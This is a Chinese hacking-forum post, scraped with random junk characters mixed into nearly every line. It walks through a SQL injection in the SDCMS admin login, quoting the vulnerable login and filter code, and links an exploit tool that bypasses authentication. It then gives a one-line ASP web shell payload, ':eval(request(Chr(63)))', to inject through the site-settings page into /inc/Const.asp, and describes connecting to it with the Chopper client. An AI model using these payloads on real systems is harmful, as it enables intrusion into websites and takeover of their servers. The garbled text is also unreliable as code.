作者:T00LS 鬼哥' T" ]9 Q$ E8 m _- g5 e% G# s
漏洞文件:后台目录/index.asp
, m! b( A" i# y9 i) |& G9 G9 X" @# r, y: P- L& R% K! o4 }6 Q3 W+ }
Sub Check
8 o( F8 j' j4 }: k+ b3 W Dim username,password,code,getcode,Rs, `1 {/ R5 k6 V
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
% w- T3 Y& X4 k* r7 T# z5 \ username=FilterText(Trim(Request.Form("username")),1)
& g# Q9 }* n" J& ~9 u. p& p0 v9 f password=FilterText(Trim(Request.Form("password")),1)
7 W$ d9 m2 f1 Q8 {4 z4 D) O code=Trim(Request.Form("yzm"))! D- C4 L8 n' G
getcode=Session("SDCMSCode")4 L# M; q8 O8 A7 @$ S. J6 c3 ?
IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died. z* z4 ^! Q8 v! I
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
4 |. V& a% J8 [8 T/ c; i IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied9 V+ Y: j& _# O
IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied
( m" U n: \8 X% q5 y% Q IF username="" or password="" Then
3 K8 [: p% v5 T' ` Echo "用户名或密码不能为空"ied( N& X* {% S" w% u. Y! v. e! x6 C) n
Else% o; i& V7 H( y8 X
Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")9 y$ I& {2 R: G0 _: y, N
IF Rs.Eof Then
, l' w9 P0 o3 {( v3 R AddLog username,GetIp,"登录失败",1* r5 z Q3 J& r( |2 k; B
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"
3 t& A8 b, d5 h( c s0 Z Else. Q) K$ d! h9 w) S) w3 B J
Add_Cookies "sdcms_id",Rs(0)
8 E" z1 U' H( r: M Add_Cookies "sdcms_name",username: M! ~$ X9 K! D
Add_Cookies "sdcms_pwd",Rs(2)6 e* |, A V7 o* C* U# i, `9 W
Add_Cookies "sdcms_admin",Rs(3)% A* t4 B: S/ F. t! f o9 _4 @
Add_Cookies "sdcms_alllever",Rs(4)
# } @* O- i2 B$ X9 u4 s Add_Cookies "sdcms_infolever",Rs(5)
: l. F5 F; z# ~ Y# J Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")
, e0 g4 r, B0 c# D AddLog username,GetIp,"登录成功",1
( {) o' f2 V& R/ F6 T' h% \4 x '自动删除30天前的Log记录
8 b( B: K2 M4 q: x IF Sdcms_DataType Then
# w: l) S, B! \/ G3 t S! c Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
% ^) Q+ Z9 g8 W/ `( D# O8 m. S9 ^ Else
! f; _3 h# |5 e9 S4 u Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
v. [: J! g: S End IF
3 T! S5 m6 _; c! Y1 S+ a9 A2 q Go("sdcms_index.asp")
3 t* P/ P9 o8 T N8 `& n End IF. {9 z% C& L) q1 v' Z
Rs.Close
; v K- }1 `3 S# _: g4 l# C' L Set Rs=Nothing, W9 z% a' C1 j2 c$ `) h
End IF
- `6 p3 M+ \/ Y# a. ?3 c/ TEnd Sub
5 h' @3 t3 X9 ~+ q( H
" `' k; _& N) Z8 Y+ m’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码
% e. f( b! _$ V, Q- h G
7 Y7 V$ j) q/ V/ u# y% Y- PFunction FilterText(ByVal t0,ByVal t1)3 q$ H7 t! i& D u9 f6 |
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
7 ?+ B% x7 @; K! m6 A1 A t0=Trim(t0)9 ?4 \+ G( K+ u. o
Select Case t1) M( t% p2 \. d* R+ y* o0 y$ i+ u
Case "1"
" J8 U( {/ } o3 t8 G3 _ t0=Replace(t0,Chr(32),"")% W$ V6 n% a5 n; ]: Y
t0=Replace(t0,Chr(13),"")
3 a% b; q0 u8 e* }4 I t0=Replace(t0,Chr(10)&Chr(10),"") G. Q( I' G8 `
t0=Replace(t0,Chr(10),"")4 U1 c# }- c8 s* v E! G- q: M
Case "2"2 @+ R" |8 ^9 ^) D
t0=Replace(t0,Chr(8),"")'回格* i' t: x- M3 I; p3 T; G4 d
t0=Replace(t0,Chr(9),"")'tab(水平制表符)- P' L% z' T$ P; ^# a( [
t0=Replace(t0,Chr(10),"")'换行$ Z1 S! X. _: q2 {
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
) F6 Y+ }9 T# n, S5 Q6 o$ j! S t0=Replace(t0,Chr(12),"")'换页" c4 H; ]4 q% I+ D! M" F( X" l+ b
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
. Z, W1 |# t2 V( u7 X9 j4 K* l: v t0=Replace(t0,Chr(22),"")! L: w! W5 P% L4 F& q4 \
t0=Replace(t0,Chr(32),"")'空格 SPACE
7 X+ z- v5 X8 \6 C t0=Replace(t0,Chr(33),"")'!
8 g5 ^6 T8 j, m# L$ i/ \+ l t0=Replace(t0,Chr(34),"")'": j. w" X& f2 u6 @: L8 ^" C- A1 G
t0=Replace(t0,Chr(35),"")'#1 B, ]% ]' T: |1 I* W
t0=Replace(t0,Chr(36),"")'$! E! y( I4 M& R+ w
t0=Replace(t0,Chr(37),"")'%
. {5 w' T/ }( X1 C" X! ` t0=Replace(t0,Chr(38),"")'&, S+ x& E0 l6 [7 P; H
t0=Replace(t0,Chr(39),"")''$ i( c* k% a5 z0 l, U* F
t0=Replace(t0,Chr(40),"")'(
I9 D( z$ k! a t0=Replace(t0,Chr(41),"")')( X3 k3 Z9 z) I, s3 v+ ?
t0=Replace(t0,Chr(42),"")'*' e% Y, X( ~: F S
t0=Replace(t0,Chr(43),"")'+( ? V; Y5 r% H$ M0 g# Q' | ?
t0=Replace(t0,Chr(44),"")',- R; `; f. Y6 g6 t; M" _
t0=Replace(t0,Chr(45),"")'-
+ F: o0 U8 c" ?+ B( W t0=Replace(t0,Chr(46),"")'.
! z' b! |$ w% s$ P5 |6 v) u t0=Replace(t0,Chr(47),"")'/8 Z G+ [1 S1 Z& \6 v
t0=Replace(t0,Chr(58),"")':
; r* [6 U4 k; l1 D t0=Replace(t0,Chr(59),"")';, i0 A# f' e% f; T( `
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>9 w; M" i7 ?5 o. j4 | U
t0=Replace(t0,Chr(63),"")'?1 v; U, D. w% n: t, p! v
t0=Replace(t0,Chr(64),"")'@
0 z. F6 k9 @( W$ L5 L6 }. V t0=Replace(t0,Chr(91),"")'\) m; a; R# ^% I, s4 _7 S' a$ _. n" _
t0=Replace(t0,Chr(92),"")'\
7 ~6 a i/ W- P! f k6 Y t0=Replace(t0,Chr(93),"")']; q9 n& u2 x0 }! V) d$ [1 v' y
t0=Replace(t0,Chr(94),"")'^
$ M* I- X% P8 `5 Y& Z2 d+ z) p% Q t0=Replace(t0,Chr(95),"")'_
+ z" Z& |% B$ A2 q9 s( j t0=Replace(t0,Chr(96),"")'`
1 R% A* `* ]+ d; b/ |$ B' h t0=Replace(t0,Chr(123),"")'{
% q' @5 D6 v+ m$ l" V+ V8 ^ t0=Replace(t0,Chr(124),"")'|
" h" Y. I: |2 {2 R9 `0 a t0=Replace(t0,Chr(125),"")'}
5 o J9 Y- C) Z t0=Replace(t0,Chr(126),"")'~6 G* q& D& P; p y
Case Else6 h& E& i$ I) X( [9 p. V
t0=Replace(t0, "&", "&")" p) i/ G! a$ ?8 a
t0=Replace(t0, "'", "'")
$ f2 i1 V0 K7 {, m @6 z# k0 v0 i; } t0=Replace(t0, """", """)8 D5 F$ K' k( b6 d; r, r
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")6 E5 l3 Y. \3 ]" Q( e
End Select8 t4 B+ W& p5 L/ i; b
IF Instr(Lcase(t0),"expression")>0 Then/ Y; Y5 ^) N1 e5 ~
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)5 p' ] T# o1 I: q1 d
End If
/ |5 w6 ] ^3 R" p FilterText=t0
, A# H6 H3 a. b: H. }; ]( TEnd Function
6 A$ N( {+ ~# s. i
* p1 ~+ S5 R/ @: ~3 u9 x看到没。直接参数是1 只过滤
?9 ]' k: E1 z' v t0=Replace(t0,Chr(32)," ")2 Q I) d# q# N
t0=Replace(t0,Chr(13),"")
5 f& s/ i5 I6 M2 ~* W4 \: _ t0=Replace(t0,Chr(10)&Chr(10),"
w4 P; E' r, l; g3 Q) U2 L0 w"), d4 a7 o5 c) e
t0=Replace(t0,Chr(10),"
|7 Q4 G4 I. g. X, Z3 b")
7 T1 ~* S: T1 P. v8 n, |# d漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!8 K- Y$ e" R5 n
EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP* A7 c6 q O3 b$ R% X
! E+ n. h9 B. A. _5 Z测试:
7 [) Y- f- }8 c& x6 S9 z" F1 ^; N3 R `8 s. A5 s; b
2 B5 l" L9 Z3 {$ Y0 S* f现在输入工具上验证码,然后点OK7 K9 ]7 n2 a0 M% y2 q
2 o, C* s [! U3 i
7 X' K0 b- G1 j( A- s; T看到我们直接进入后台管理界面了,呵呵!7 m$ v3 `0 E( |; O
7 O# a1 N0 \! Y
( i3 x- r4 a6 Q; p' C9 D
4 n# s1 W+ A9 y8 ~+ g' X, T! Y: F这样直接进入后台了。。。。. x3 p7 @( }+ ?' m
) b, y: n" ?- p7 ~# U" l
5 o- v5 d" \0 i d5 e- e2 v8 }: f! G/ c. d( s
SDCMS提权:3 T- q9 ~) s9 W) U, k* W
5 d% t; | {: q4 L8 U4 o) k
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
# t+ G4 w* n' n! g+ Z/ I" [6 h! _- a' K/ N% ~, j9 ~
# n% O! J8 J9 p% ?# p# J+ s- m) U
OK,现在用菜刀连接下!
* O" N1 _% k. K
$ _' `! E0 [9 D3 ?9 C( _ _; E4 q
9 w+ d5 B! \( e: H! V
( e. z, J2 Z, `' x7 n * {' \1 ^9 k. t0 L) ^
- r7 i$ j' p! O |
发表于 2012-11-9 20:57:02
收藏
支持
反对